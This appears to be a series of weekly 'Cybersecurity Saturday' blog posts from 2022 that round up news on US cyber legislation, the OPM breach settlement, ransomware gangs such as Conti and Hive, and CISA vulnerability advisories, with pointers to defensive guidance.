Cybersecurity Saturday

Cybersecurity Saturday

From Capitol Hill, Security Week reports

Two bipartisan cybersecurity bills were signed into law on Tuesday, June 21, 2022, by US President Joe Biden: the Federal Rotational Cyber Workforce Program Act of 2021, and the State and Local Government Cybersecurity Act of 2021.

The Federal Rotational Cyber Workforce Program Act, which has been around since 2018, proposes a program under which certain federal employees can be temporarily moved to other agencies in an effort to boost their skills.

Agencies can determine whether a position involving IT or cybersecurity is eligible for the program. The Office of Personnel Management is tasked with creating an operation plan, and the Government Accountability Office must assess the effectiveness of the program.

The State and Local Government Cybersecurity Act of 2021, is meant to improve collaboration between the Department of Homeland Security and state, local, tribal and territorial governments.

From the cyber vulnerabilities front —

Health IT Security informs us

Application Programming Interface (API) adoption is steadily increasing in the healthcare sector, but APIs do not come without cybersecurity risks. In fact, Gartner predicted that API attacks would become the most common attack vector by 2022.

Application Programming Interface (API) adoption is steadily increasing in the healthcare sector, but APIs do not come without cybersecurity risks. In fact, Gartner predicted that API attacks would become the most common attack vector by 2022.

In healthcare, evidence suggests that API adoption could revolutionize interoperability efforts and health data exchange. In addition, providers are increasingly implementing APIs to comply with the CMS Interoperability and Patient Access final rule. Meanwhile, the HL7 Fast Healthcare Interoperability Resources (FHIR) standard is quickly gaining recognition in the health IT space.

In a recent report, Imperva partnered with the Marsh McLennan Global Cyber Risk Analytics Center to analyze API-related incident data and quantify the cost of API insecurity. Researchers discovered that the lack of security APIs may cause $12 billion to $23 billion in average annual API-related cyber loss in the US and anywhere from $41 billion to $75 billion globally.

“These estimates provide a view on losses that are entirely avoidable,” the report suggested.

“If companies made an upfront investment in properly securing all of their APIs, their API-related losses could decrease significantly even as their API adoption continues to increase.”

Cybersecurity Dive tells us

Malicious actors continue to dog VMware Horizon and Unified Access Gateway server deployments, capitalizing on unpatched Log4Shell, the Cybersecurity and Infrastructure Security Agency said Thursday in a joint advisory with the U.S. Coast Guard Cyber Command.

The agencies are calling for organizations to update all VMware Horizon and UAG systems and, if fixes weren’t applied in Dec. 2021, organizations should consider their systems compromised and start threat hunting. 

Cybersecurity Dive adds

Two of every five organizations don’t have strong confidence in their open source software security, according to a joint study from The Linux Foundation and Snyk, a firm that specializes in developer security. Just half of organizations actually have a security policy related to open source development or usage, the research showed. 

The average application development project has 49 vulnerabilities and 80 direct dependencies, according to the report. 

The time required to fix vulnerabilities in open source more than doubled to 110 days in 2021, compared with 41 days during 2018, the report found.

From the ransomware front, we have a link to the latest Bleeping Computer’s The Week in Ransomware.

The Conti ransomware gang has finally ended their charade and turned off their Tor data leak and negotiation sites, effectively shutting down the operation.

Since May, a lone Conti member has been posting data from older victims to make the gang appear alive, but in reality, Conti shut down last month.

The members are now long spread out in smaller cells among different operations, making it more challenging to target the crime syndicate.

From the cyber defenses front, ISACA reports on “Why (and How to) Dispose of Digital Data.”

Cybersecurity Saturday

Cybersecurity Dive provides five takeaways from the RSA conference held in San Francisco from June 6 through 9.

From the cyber breach front, MeriTalk provides more details on the settlement of the lawsuit against OPM over the massive 2015 data breach.

The lead counsel in the class action said that individual victims are in line for minimum payments of $700 each under the terms of the settlement, which still needs to be finalized. * * *

The preliminary settlement agreement will be subject to further consideration at a fairness hearing set for Oct. 14.

From the cyber vulnerabilities front,

  • Here is a link to CISA’s known exploited vulnerabilities catalog. Bookmark that one.
  • Becker’s Hospital Review explains why “Cybersecurity experts say that the two biggest threats to healthcare cybersecurity are insider threats and ransomware.”
  • Security Week reports “Microsoft has fixed roughly 50 vulnerabilities with its June 2022 Patch Tuesday updates, including the actively exploited flaw known as Follina and CVE-2022-30190.”

From the ransomware front

  • Cybersecurity Dive discusses how ransomware groups are shifting tactics and objectives.
  • Here is a link to Bleeping Computer’s The Week in Ransomware.

From the cyber defense front

  • HHS’s Healthcare Cybersecurity Coordination Center (HC3) offers a presentation about strengthening cyber posture in the health sector.
  • TechRepublic reports that half of IT leaders want to implement more robust alternatives to passwords, and it describes options.
  • ISACA Journal offers an article on how businesses can reduce cybersecurity exposures to and from third parties.

Cybersecurity Saturday

From the cyberattack front, Federal News Network reports

A D.C. federal judge this week preliminarily approved a $63 million settlement as part of a class action lawsuit brought by victims of the breach into OPM databases. The breach was uncovered in 2015. By then, hackers had stolen the records of nearly 22 million current and former federal employees. The Chinese government is widely thought to be behind the attack. The proposed settlement would only compensate those who can prove they were financially affected by the breach. The court’s order set a Dec. 23 deadline to submit a claim.

Health IT Security adds “Shields Health Care Group reported a healthcare cyberattack to HHS impacting 2 million individuals. The Massachusetts-based healthcare group provides MRI, PET/CT, and ambulatory surgical services to patients across New England at more than 30 locations.”

From the cybervulnerabilities front, Cyberscoop explains

When the Cybersecurity and Infrastructure Security Agency [CISA] debuted its list of known, exploited vulnerabilities in November, it was nearly 300 flaws long and came attached to an order for federal agencies to fix them quickly.

Now, as of this week, the catalog known as “KEV” or the “Must-Patch” list is well on its way to 800 listings, and it’s the “No. 1 topic” that CISA Executive Director for Cybersecurity Eric Goldstein says comes up in his frequent, daily meetings with businesses.

The reason, said Goldstein, is that the private sector has — without any order from his agency — adopted the KEV list as a guide for the vulnerabilities they focus on, rather than relying on the traditional open-source industry standard Common Vulnerability Scoring System for assessing the severity of software weaknesses.

This week, CISA first added 36 and then three more known, exploited vulnerabilities to its catalog.

The HHS Health Sector Cybersecurity Coordination Center posted its May report about vulnerabilities of interest to the health sector.

Cybersecurity Dive updates us on Microsoft’s Follina and Atlassian’s Confluence recent zero-day vulnerabilities.

CISA released a joint federal agency alert on People’s Republic of China-sponsored cyber actors.

From the ransomware front, Security Week reports

It doesn’t pay to pay [ransom]. This advice on ransomware payment is often given, but rarely enumerated. Now it has been. A new study finds that 80% of companies that paid a ransom were hit a second time, with 40% paying again. Seventy percent of these paid a higher amount the second time round.

These figures come from an April 2022 Cybereason study that queried 1,456 cybersecurity professionals from organizations with 700 or more employees. The shocking nature of the statistics, published in Ransomware: The True Cost to Business (PDF) go much deeper. 

It’s not a problem that can be ignored with the vague belief, ‘it won’t happen to me’. Seventy-three percent of organizations have suffered at least one ransomware attack in the past 24 months – up 33% from last year.

Sixty percent of companies admitted ransomware gangs had been in their network from one to six months before they were discovered – a key indicator of a double extortion attack. But paying the double extortion fee doesn’t really help; nearly 200,000 companies never received their data back after paying. And the criminals still have the data regardless. Thirty-five percent of companies suffered C-level ‘resignations’ because of a ransomware attack.

Other key findings of the research include the prevalence of the supply chain as a factor in the attack. Sixty-four percent of companies believe the ransomware gang got into their network via one of their suppliers or business partners.

Health IT Security adds

Healthcare ransomware attacks are not slowing down, prompting an increased demand for reliable cyber insurance policies. But as healthcare cyberattacks skyrocket, cyber insurers are pushing up prices or leaving the market altogether, Sophos stated in its “State of Ransomware in Healthcare 2022” report.

Sophos surveyed 5,600 IT professionals, including 381 in healthcare, to garner insights on how healthcare organizations are navigating the cyber threat landscape.

The report found that 66 percent of surveyed healthcare organizations were hit by ransomware in 2021, up from just 34 percent in 2020. About 61 percent of those attacks resulted in data encryption. Survey results also revealed that healthcare was the most likely sector to pay a ransom. Just over 60 percent of respondents who experienced encryption admitted to paying the ransom, compared to a cross-sector average of 46 percent.

Here is a link to Bleeping Computer’s Week in Ransomware.

From the cyber defense front, here are links to a Wall Street Journal report on personal password management and a CISA article on multi-factor authentication.

Cybersecurity Saturday

From Capitol Hill, Cyberscoop reports

A sweeping federal privacy bill unveiled Friday [June 3] would give Americans unprecedented control over how companies collect and use their data. 

The discussion draft was released by Sen. Roger Wicker, R-Miss., and Reps. Cathy McMorris Rodgers, R-Wa., and Frank Pallone, D-Mass. It represents the results of months of intense negotiations and is a step toward federal privacy protections long-awaited by civil society groups.

The 64-page privacy framework introduces a range of changes designed to give consumers more control over their data. It would require covered companies to limit data collection, allow consumers to turn off targeted advertisements, grant broad protections for Americans against discriminatory uses of their data and rein in third-party data collection.

The bill also carves out special protections regarding biometric data, a growing source of concern for privacy and human rights activists. Under the legislation, companies can only collect and share biometric data under specific instances including responding to a warrant and affirmative consent.

The FEHBlog notes that the data security and protection of covered data section 208 is integrated with the corollary HIPAA and Gramm-Leach-Bliley rules.

From the law enforcement front

Cybersecurity tells us

The FBI managed to detect and mitigate an attack by Iranian state-sponsored hackers against Boston’s Children’s Hospital last summer, FBI Director Christopher Wray revealed on Wednesday.

“Quick actions by everyone involved, especially at the hospital, protected both the network and the sick kids that were dependent on it,” Wray said at the Boston Conference on Cyber Security

Wray called the incident one of the “most despicable cyberattacks” he’s seen, but he noted that the threat was hardly an isolated one. In 2021 the FBI saw ransomware attacks against 14 of the 16 services deemed critical infrastructure by the U.S. government, including hospitals. The FBI issued a warning last November that Iranian hackers were seeking data that could be used to hack U.S. companies.

The agency has been “laser-focused” on potential threats to critical infrastructure resulting from the United States’ support of Ukraine during an ongoing invasion of the nation by Russia. The United States has observed Russia “taking specific preparatory steps towards potential destructive attacks, both here and abroad,” Wray said. And the fallout of those attacks could get worse.

Nextgov informs us

Federal law enforcement agencies have seized several internet domain names in pursuit of an international investigation into websites that permit users to buy stolen personal data and information or hack other networks. 

Announced on Wednesday [June 1], the domain names OVH Booter, WeLeakInfo and IPStress.in have all been procured by the Federal Bureau of Investigation and Department of Justice with a seizure warrant issued by a U.S. District Court for the District of Columbia. 

“Today, the FBI and the department stopped two distressingly common threats: websites trafficking in stolen personal information and sites which attack and disrupt legitimate internet businesses,” said U.S. Attorney Matthew Graves. “Cybercrime often crosses national borders. Using strong working relationships with our international law enforcement partners, we will address crimes like these that threaten privacy, security and commerce around the globe.”

From the vulnerabilities front over the last week

  • CISA has updated Cybersecurity Advisory AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control, originally released May 18, 2022. The advisory has been updated to include additional indicators of compromise and detection signatures, as well as tactics, techniques, and procedures reported by trusted third parties. CISA encourages organizations to review the latest update to AA22-138B and update impacted VMware products to the latest version or remove impacted versions from organizational networks. 
  • Microsoft has released workaround guidance to address a remote code execution (RCE) vulnerability—CVE-2022-30190, known as “Follina”—affecting the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated attacker could exploit this vulnerability to take control of an affected system. Microsoft has reported active exploitation of this vulnerability in the wild. CISA urges users and administrators to review Microsoft’s Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability and apply the necessary workaround.  Bleeping Computer offers more details on Follina, and Wired offers an update on this Follina warning.
  • Atlassian has released new Confluence Server and Data Center versions to address remote code execution vulnerability CVE-2022-26134 affecting these products. An unauthenticated, remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability. CISA strongly urges organizations to review Confluence Security Advisory 2022-06-02 and upgrade Confluence Server and Confluence Data Center.
  • The Healthcare Cybersecurity Coordination Center offered a webinar on the Return of Emotet and the Threat to the Health Sector. Emotet has been called the world’s most dangerous malware.

From the ransomware front over the last week

The Wall Street Journal reports, “Russia-linked ransomware groups are splitting into smaller cells or cycling through different types of malware in attempts to evade a growing array of U.S. sanctions and law-enforcement pressure, cybersecurity experts say.”

CISA issued an alert on the Karakurt Data Extortion Group. “Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.”

Here is a link to the latest Bleeping Computer’s Week in Ransomware.

From the cyber defense front

  • Cyberscoop offers a video interview with Jim Richberg, Public Sector Field CISO and VP of Information Security at Fortinet concerning “important strategies to counter today’s heightened threat environment.”
  • ZDNet identifies five simple errors that can make your “cloud” an attractive target for hackers.
  • Security Week discusses four tactics to protect email systems.
  • Health IT Security delves into the topic of HIPAA Physical Safeguards.

Cybersecurity Saturday

From Capitol Hill, Health IT Security reports

The US Senate Committee on Health, Education, Labor, and Pensions (HELP) held a full committee hearing on May 18 to discuss the need for an increased focus on education and healthcare cybersecurity.

“Attacks on healthcare are increasing in volume, variety, and impact—with consequences that now include the loss of life,” Joshua Corman, founder of I Am the Cavalry, said in his testimony.

“While directionally correct steps have been taken, we’re getting worse faster than we’re getting better. Bold actions and assistance will be required to change this trajectory, address these market failures, lack of incentives, and historical under-investments.”

Healthcare Dive adds

* Internal actors continue to pose a sticky cybersecurity problem for healthcare companies despite not causing a majority of data breaches, according to a new data breach report from Verizon.

* Employees were responsible for 39% of healthcare breaches last year. That’s compared to just 18% across all industries, Verizon found.

* The makeup of the insider breach has shifted from generally malicious misuse incidents to miscellaneous errors, with employees being more than 2.5 times more likely to make an error than purposefully misuse their access. Data misdelivery — like sending an email to the wrong person — along with device or document loss are the most common employee errors in healthcare, according to the report.

CISA offers its assistance:

Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States, Canada, New Zealand, the Netherlands,and the United Kingdom.

Download the PDF version of this report (pdf, 430kb).

Also from the vulnerability front, Cybersecurity Dive reports

Recurring critical vulnerabilities for VMware products this year indicate a worrying trend for customers that suggests the virtualization leader is taking a more reactive approach to security.

The company’s VMware Horizon product got hit hard by the Log4j vulnerability, and earlier this month VMware found itself entangled in an emergency directive from the Cybersecurity and Infrastructure Security Agency (CISA) that impacts up to 10 VMware products. 

It was the 10th emergency directive issued by CISA since the agency was founded in late 2018. 

Virtualization software is ubiquitous and managing the technology is further complicated by its many parts, ExtraHop CISO Jeff Costlow wrote in an email. Threat actors target vulnerabilities across these disaggregated systems before patches are released or deployed by impacted organizations.

VMware’s reputation in this regard has also taken a hit. 

Perhaps that’s what lead to this Wall Street Journal reports

Broadcom Inc. Chief Executive Hock Tan’s $61 billion deal to buy VMware Inc. marks the biggest bet yet that the boom in enterprise software demand will endure despite the economic tumult—and that bundling disparate offerings of low-profile products can yield outsize returns. 

Mr. Tan built Broadcom into a microchip powerhouse by acquiring makers of a host of unsexy-but-essential components, then cutting costs and leveraging the company’s growing pricing power. He is now banking that the same model will work in corporate software.

The deal to buy VMware, announced Thursday after The Wall Street Journal reported on details of the talks earlier in the week, would push Broadcom deeper into a software world populated by incumbents such as International Business Machines Corp. and Oracle Corp. as well as independent companies that specialize in niche applications. 

CISA added 20 known exploited vulnerabilities to its catalog this past week.

Bleeping Computer’s the Week in Ransomware was not published this week. Have a good Memorial Day Weekend.

Cybersecurity Update

From Capitol Hill, Nextgov informs us

Having cleared the Senate in January, the State and Local Government Cybersecurity Actpassed the House Tuesday and now awaits President Joe Biden’s signature.

The bill updates the House Homeland Security Act to direct the Department of Homeland Security to improve information sharing and coordination with state, local and tribal governments—all of which face growing risks of cyberattack. The legislation requires federal cybersecurity officials to share cybersecurity threat, vulnerability and breach data with states and localities, and provide some recovery resources when attacks occur.

From the vulnerabilities front —

Federal News Network reports

Agencies have until Monday [May 23] to mitigate vulnerabilities in five products from VMware that permit attackers to have deep access without the need to authenticate.

The Cybersecurity and Infrastructure Security Agency issued a new emergency directive today saying the vulnerabilities in VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager put federal networks and systems at immediate risk.

“These vulnerabilities pose an unacceptable risk to federal network security,” said CISA Director Jen Easterly in a release. “CISA has issued this Emergency Directive to ensure that federal civilian agencies take urgent action to protect their networks. We also strongly urge every organization — large and small — to follow the federal government’s lead and take similar steps to safeguard their networks.”

Here’s a link to the CISA website on this emergency directive.

CISA also released an analysis of Fiscal Year 2021 Risk and Vulnerability Assessments.

[This] analysis and infographic details the findings from the 112 Risk and Vulnerability Assessments (RVAs) conducted across multiple sectors in Fiscal Year 2021 (FY21). 

The analysis details a sample attack path comprising 11 successive tactics, or steps, a cyber threat actor could take to compromise an organization with weaknesses that are representative of those CISA observed in FY21 RVAs. The infographic highlights the three most successful techniques for each tactic that the RVAs documented. Both the analysis and the infographic map threat actor behavior to the MITRE ATT&CK® framework. 

CISA also added two known exploited vulnerabilities to its catalog last week.

From the ransomware front

Cybersecurity Dive reports

Most executives have and are willing to pay ransoms in the event of an attack, despite broad and consistent advice to the contrary. 

Nearly four in five organizations impacted by ransomware attacks have paid the ransom to regain access to corporate data, according to a survey conducted last month by Kaspersky.

The findings, while not surprising, highlight the extent to which a widely acknowledged best practice is rarely followed. Cybersecurity professionals, including Kaspersky, consistently advise businesses hit by ransomware to never pay the ransom.

Cyberscoop tells us

The federal government has made strides in deterring ransomware over the past year, but still has a number of milestones to reach, according to a new paper from the Institute for Security and Technology’s Ransomware Task Force. * * *

Of the 48 specific recommendations the Ransomware Task Force made in its initial report, 12 have seen tangible progress in the year since. Some initial steps have been taken on 29 recommendations, while seven recommendations have seen no action.

The United States has made the most progress in addressing the RTF’s recommendations for deterring ransomware, according to Friday’s update. In addition to the Department of Homeland Security launching a hiring “sprint” to combat cyber crime, the Justice Department last year created its own ransomware task force. And at the event Friday, Cybersecurity and Infrastructure Security Agency Director Jen Easterly said the DHS unit is creating another task force to collaborate with the FBI and other agencies that fight cybercrime.

The Healthcare Cybersecurity Coordination Center released a PowerPoint on major cyber organizations of the Russian Intelligence Services.

Bleeping Computer reports

The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more.

This news comes from Advanced Intel’s Yelisey Boguslavskiy, who tweeted [last Thursday] afternoon that the gang’s internal infrastructure was turned off. * * *

While it may seem strange for Conti to shut down in the middle of their information war with Costa Rica, Boguslavskiy tells us that Conti conducted this very public attack to create a facade of a live operation while the Conti members slowly migrated to other, smaller ransomware operations.

Of course, here is a link to the Bleeping Computer’s Week in Ransomware

From the cyber defenses front

The Wall Street Journal reports

The Justice Department on Thursday [May 19] urged prosecutors to narrow their enforcement of the nation’s main anti-hacking law in a bid to protect legitimate researchers who probe technology for security flaws.

The policy change is a victory for the many cyber professionals and academics who have criticized the Computer Fraud and Abuse Act for potentially criminalizing research that security experts see as key to protecting computer systems from cyberattacks.

Health Data Management discusses seven key steps for avoiding cyberattacks.

1. Protect all workloads


2. Know your adversary


3. Be ready when every second counts


4. Adopt a zero-trust approach


5. Monitor the cybercriminal underground


6. Invest in elite threat hunting


7. Build a cybersecurity culture

CISA offers an updated list of its “free” cybersecurity services, tools, and resources.

Cybersecurity Saturday

From our Nation’s Capital, Cybersecurity Dive reports

On the one-year anniversary of the Executive Order on Improving the Nation’s Cybersecurity, industry experts say the Biden administration has made significant inroads in raising software security standards, but additional work and financial support is necessary to achieve security end goals. 

The Office of Management and Budget’s (OMB) federal zero trust strategy enjoys almost unanimous support from federal cybersecurity decision makers, however two-thirds of federal cybersecurity decision makers said the three-year timeline was unrealistic, according to a study from MeriTalk, sponsored by AWS, CrowdStrike and Zscaler. Just 14% of those surveyed believe the program is properly funded.

Almost two-thirds of federal officials expect to achieve zero trust goals by the goal date of 2024, according to a separate study from General Dynamics Information Technology. However, many of those officials see significant challenges, including a lack of sufficient IT staff and the need to replace legacy infrastructure.

My, how time flies.

Cyberwire adds

A $63 million settlement has been reached in the class-action lawsuit filed over the 2015 data breach of the US Office of Personnel Management (OPM) that exposed the data of over 21 million current, former, and prospective federal employees and families members, the Epoch Times reports. The files were allegedly stolen by China-backed hackers, who exfiltrated highly sensitive information such as fingerprints and psychological and emotional health histories, and it is reported that the Chinese government has been using data from such breaches to build a database on American citizens for political and economic espionage. The agreement explains, “The settlement is the result of extensive negotiations and accounts for the unique aspects of this litigation, including the strict limitation on recovering from the Government and the causation problems that Defendants would have argued result from the hack’s attribution to a foreign state actor…That these data breaches were attributed to the Chinese government, apparently motivated by foreign policy considerations, would have compounded the risks associated with tracing plaintiffs’ harm to [OPM].” Under the settlement, which is still awaiting approval from a federal judge, OPM will pay $60 million and OPM contractor Peraton will pay $3 million into a fund for victims of the hack. 

The news strikes the FEHBlog as a good deal for the government.

From the ransomware front, Cyberscoop informs us

vosLocker, a prolific ransomware group that was the subject of a recent joint FBI and U.S. Treasury Department warning, claimed this week that it had hit a Dallas-based nonprofit Catholic health system with more than 600 facilities across four U.S. states, Mexico, Chile and Colombia.

The attack on CHRISTUS Health marks the second health care system AvosLocker targeted in the last two months. Michigan-based McKenzie Health System began notifying customers this week that patients’ personal data had been stolen from the company’s network in a “security incident” that “disrupted” some of its IT systems in March. The company did not identify the attacker, but AvosLocker posted purported McKenzie data to its dark web leak site April 6. * * *

Security Week adds

Over the past several months, Iran-linked cyberespionage group Charming Kitten has been engaging in financially-motivated activities, the Secureworks Counter Threat Unit (CTU) reports.

Also referred to as APT35, Magic Hound, NewsBeef, Newscaster, Phosphorus, and TA453, the advanced persistent threat (APT) actor is known for the targeting of activists, government organizations, journalists, and various other entities. * * *

The security researchers assess that, while the group has managed to compromise a large number of targets worldwide, “their ability to capitalize on that access for financial gain or intelligence collection appears limited.” However, the use of publicly available tools for ransomware operations shows that the group remains an ongoing threat, Secureworks concludes.

For more on Charming Kitten, check out this Cyberscoop article.

Here is a link to the Bleeping Computer’s Week in Ransomware column.

From the cyber vulnerabilities front, CISA added one new known vulnerability to its catalog.

From the cyber defenses front, here’s a link to a press release of note

The Cybersecurity and Infrastructure Security Agency (CISA), in partnership with the United Kingdom’s National Cyber Security Centre (NCSC-UK), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) released an advisory today [May 11] with cybersecurity best practices for information and communications technology (ICT), focusing on enabling transparent discussions between managed service providers (MSPs) and their customers on securing sensitive data. CISA, NCSC-UK, ACSC, CCCS, NZ-NCSC, NSA, and FBI expect state-sponsored advanced persistent threat (APT) groups and other malicious cyber actors to increase their targeting of MSPs against both provider and customer networks. 

Security Week offers an expert view on seven steps to reduce risk to your critical infrastructure quickly.

Cybersecurity Saturday

From the ransomware front

The HHS Cybersecurity Program released a PowerPoint presentation on ransomware trends in the first quarter of this year.

Here’s a link to Bleeping Computers’ The Week in Ransomware.

Ransomware operations continue to evolve, with new groups appearing and others quietly shutting down their operations or rebranding as new groups. * * * [For example,] the notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks.

Bleeping Computer adds

The US Department of State is offering up to $15 million for information that helps identify and locate leadership and co-conspirators of the infamous Conti ransomware gang.

Up to $10 million of this reward are offered for info on Conti leaders’ identity and location, and an additional $5 million for leading to the arrest and/or convictions of individuals who conspired or attempted to participate in Conti ransomware attacks.

From the vulnerabilities front

  • The HHS Cybersecurity Program issued a bulletin on “April Vulnerabilities of Interest to the Health Sector”

The FBI has warned that business email compromise (BEC) fraud cost businesses around the world $43 billion in losses during the period between June 2016 and December 2021.  The FBI’s Internet Crime Center (IC3) logged a whopping 241,206 complaints in the four-and-a-half-year period, with losses totaling $43 billion, according to a new public service announcement

From the cyberdefenses front, CISA “is beginning a month-long mission to rock the message that multifactor authentication keeps you more secure! So, join us for MFA May!” Throughout the month of May:

Follow CISA on TwitterFacebookLinkedIn, and Instagram for rocking content all month on MFA.

Tell us on social media that your business or personal devices are now protected by MFA with the hashtag #EnableMFA!  We’ll do our best to Pour Some Sugar on your posts!

And since we all get by With A Little Help from Our Friends, challenge your friends, family, co-workers, and fellow rockers to #EnableMFA too.

For What it’s Worth, you can always learn more about multi-factor authentication at https://www.cisa.gov/mfa

Cybersecurity Saturday

From the ransomware front, Cybersecurity Dive reports

The prevalence and scope of ransomware exploded in 2021, as two-thirds of mid-sized organizations worldwide were targets and average ransom payouts saw a five-fold increase, according to the State of Ransomware 2022 report from Sophos released Wednesday. 

Ransomware hit 66% of mid-sized organizations last year, up from 37% in 2020. Average ransom payments reached $812,000 during 2021, compared with $170,000 the prior year.  

Among organizations with encrypted data, 46% paid a ransom to adversaries. In addition, 26% of organizations who were able to restore data from backups, still decided to pay a ransom.

To make matters even worse, Security Week informs us

As part of a recent cyberattack, threat actors deployed ransomware less than four hours after compromising the victim’s environment, according to researchers with The DFIR Report.

The attack started with an IcedID payload being deployed on a user endpoint and led to the execution of Quantum ransomware only three hours and 44 minutes later. DFIR Report researchers described it as one of the fastest ransomware attacks they have observed to date.

In a Ryuk ransomware attack in October 2020, the threat actors started encrypting the victim’s data only 29 hours after the initial breach, but the median global dwell time for ransomware is roughly 5 days, according to Mandiant’s M-Trends 2022 report.

Once the ransomware has been executed, however, the victim’s data may be encrypted within minutes. A recent report from Splunk shows that ransomware needs an average of 43 minutes to encrypt data, while the fastest encryption time is less than 6 minutes.

ZDNet describes how a single failure to patch a vulnerability opened the door to ransomware hackers. The article emphasizes the importantance of basic cybersecurity hygiene advice:

“The biggest lesson here is patch the network infrastructure – whatever is facing the internet, it’s always important for it to be fully patched,” said Daniel dos Santos, head of security research at Forescout

It’s also recommended that organisations monitor their networks for external access from known IP addresses or unusual patterns of behavior. In addition, businesses should backup their servers regularly. Then, if something happens, the network can be restored to a recent point without needing to pay a ransom. 

Perhaps then it is not surprising that a Security Week expert advises “it is important to increase an organization’s ransomware preparedness and assure that the tools needed for remediation, eradication, and recovery are not just in place but also functioning as expected. This is especially true for the recovery of endpoints, which represent an essential tool for remote workers to conduct their assigned business tasks in today’s work-from-anywhere environment.” 

As always and it may be every other week now, here is a link to Bleeping Computer’s The Week in Ransomware.

From the vulnerabilities front, HHS Cybersecurity Program released

  • a report on 2021’s top exploited vulnerabilities
  • a warning about BlackCat/ALPHV Ransomware Indicators of Compromise, and
  • an international joint cybersecurity advisory on Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure.

CISA added “seven new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.”

Health IT Security notes

Mandiant Threat Intelligence observed a record number of zero-day exploits in 2021, its latest report revealed. The firm identified 80 exploited zero-days in 2021, compared to just 30 in 2020. Threat actors favored zero-days in Google, Microsoft, and Apple products most frequently, largely exhibiting the popularity of those vendors.

The term “zero-day” indicates that there is no time between when a vulnerability is discovered by developers and when it is exploited by bad actors.

From the cyberdefenses front —

  • Healthcare Dive discusses what cyber insurance companies expect from their policyholders.
  • Federal News Network provides insights into achieving zero trust requirements.
  • ISACA explains what you need to know about malicious cybertrends.

Cybersecurity Saturday

The Wall Street Journal recently interviewed IBM’s CEO Arvind Krishna. The interview concludes as follows:

WSJ: What is the biggest challenge facing the CIO and enterprise technology going forward?

Mr. Krishna: Cybersecurity is the issue of the decade. I think that is the single biggest issue we all are going to face. You have to take an enterprise approach, layered defenses. You have got to encrypt your data. You have got to worry about access control. You have got to believe you will get broken into. You make sure that you can recover really quickly, especially when it comes to critical systems.

Well put

The Cybersecurity and Infrastucture Security Agency informs us

The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with attacks involving BlackCat/ALPHV, a Ransomware-as-a-Service that has compromised at least 60 entities worldwide.

CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000167-MW and apply the recommended mitigations. 

Security Week and Bleeping Computer expand on this FBI alert for those interested.

CISA also added three known exploited vulnerabilities to its catalog.

In other vulnerability news, Cyberscoop tells us

More than 450 security researchers working through the Department of Homeland Security’s “Hack the DHS” bug bounty program identified more than 122 vulnerabilities, 27 of which were deemed critical, according to a DHS statement first obtained by CyberScoop.

The agency awarded $125,600 to participants in the program for finding and identifying the vulnerabilities, the agency said in the statement. The researchers, vetted by the agency before participating, were eligible to receive between $500 and $5,000 for verified vulnerabilities, depending on the severity. * * *

Friday’s results represent the first phase of the DHS bug bounty program. The second phase will consist of a live, in-person hacking event, while the third will identify lessons learned to inform future bug bounty programs.

Cybersecurity Dive reports

Amazon Web Services is scrambling to assist customers after security researchers at Palo Alto Networks found severe vulnerabilities in AWS hotpatches that were supposed to protect customers from the Log4Shell vulnerability. 

AWS released a software tool in mid-December designed to patch vulnerabilities found in the Log4j library, however security researchers at Palo Alto’s Unit 42 discovered code vulnerabilities that could let attackers break out of a container environment and gain escalated privileges. 

After working with Palo Alto researchers for months, Amazon released a new hotpatch earlier this week, Unit 42 said in research released Tuesday. Unit 42 researcher Yuval Avrahami is urging organizations to review their container environments and upgrade to the fixed version. A large number of users may have downloaded the original hotpatches. 

The HHS Health Sector Cybersecurity Coordination Center (HC3) released a comprehensive PowerPoint presentation about insider threats in healthcare.

From the ransomware front HC3 issued an an alert on Hive ransomware.

Hive is an exceptionally aggressive, financially-motivated ransomware group known to maintain sophisticated capabilities who have historically targeted healthcare organizations frequently. HC3 recommends the Healthcare and Public Health (HPH) Sector be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise.

Beckers Health IT Issues explains

Here a four things to know about the cyber group, according to the warning: 

1. The group uses many common ransomware tactics, including the exploit of remote desktop protocol or VPN, and phishing attacks, in addition to more aggressive methods like directly calling the victims to apply pressure and negotiate ransom payments.

2. Other tactics deployed by the group include searching the victim’s systems that are tied to backups and either terminating or disrupting those connections, deleting shadow copies, backup files and even system snapshots.

3, Hive also conducts double extortion and supports this with their data leaks site, while operating as a ransomware-as-a-service model.

In total, Hive has claimed attacks on approximately 355 companies within 100 days of operations.

HHS is urging healthcare organizations to increase its preventive security measures, such as two-factor authentication, strong passwords, sufficient backups of the most critical data and continuous monitoring.

Speaking of passwords, Cybersecurity Dive discusses the efforts of the FIDO Alliance to gain industry acceptance of using smartphones as the IT authentication standard while the tech industry presses for new methods.